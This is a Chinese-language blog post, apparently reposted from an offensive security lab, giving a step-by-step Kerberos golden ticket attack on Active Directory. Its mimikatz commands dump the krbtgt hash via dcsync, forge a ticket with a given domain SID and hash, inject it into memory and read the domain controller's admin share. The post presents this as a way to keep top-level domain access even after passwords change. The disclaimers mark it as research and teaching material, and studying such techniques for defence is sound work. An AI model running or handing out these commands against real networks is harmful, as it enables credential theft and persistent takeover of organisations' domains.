黄金票据——域渗透

admin 2025年6月10日19:02:58评论23 views字数 1309阅读4分21秒阅读模式
声明

以下内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。
长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。
0x01前言

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。攻击者一旦拿到域管权限的账号就可以伪造出黄金票据,逃过账号和密码的验证,即使修改管理员密码,攻击者依然能通过黄金票据进行访问。
0x02原理

kerberos认证中Client通过AS认证后,AS会给Client一个由Client的Master Key加密过的和TGT,Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到NTLM就能伪造TGT和Logon session key,直接进入到下一步的Client与TGS的交互。

一、前提
1.票据制造前提
1.1域名称
1.2域的SID值
1.3域的KRBTGT账号的HASH

二、获取域内基本信息

2.域控内收集信息

2.1 获取域SID:

wmic useraccount list brief

黄金票据——域渗透
2.2 查询域管理员账号:

net group "domain admins" /domain

黄金票据——域渗透
2.3查询域名

ipconfig /all

黄金票据——域渗透
2.4获取NTLM HASH

mimikatz(commandline) # privilege::debug mimikatz(commandline) # lsadump::dcsync /domain:域名 /all /csv mimikatz(commandline) # lsadump::dcsync /domain:域名 /user:krbtgt (可以获得NTLM hash值)
黄金票据——域渗透
黄金票据——域渗透
该方法使用mimikatz工具的dcsync功能远程转储活动目录AD中的ntds.dit指定的 /user 参数,可以只导出 krbtgt 账号信息。

0x03利用

操作如下:

1、清空内存
mimikatz# kerberos::purge
黄金票据——域渗透
2、构造出用户为cc的票据,在当前目录下可以看见cc.kiribi

kerberos::golden /admin:cc /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:cc.kiribi
黄金票据——域渗透
3、传递票据并注入内存

将kiribi传入到域内其他机器,然后注入到内存中

mimikatz # kerberos::ptt cc.kiribi黄金票据——域渗透

4、查看注入的票据

域内主机下查看Klist

黄金票据——域渗透
mimikatz# kerberos::tgt
黄金票据——域渗透
0x04权限验证

dir \owac$
黄金票据——域渗透
成功读取到域控C盘下目录

0x05高手过招点到为止

黄金票据等于是复刻了一把带有域控管理员权限的钥匙,当域控权限丢失后,仍然可以利用票据重新获取最高权限。
 

原文始发于微信公众号(长白山攻防实验室):黄金票据——域渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月10日19:02:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   黄金票据——域渗透https://cn-sec.com/archives/1076506.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息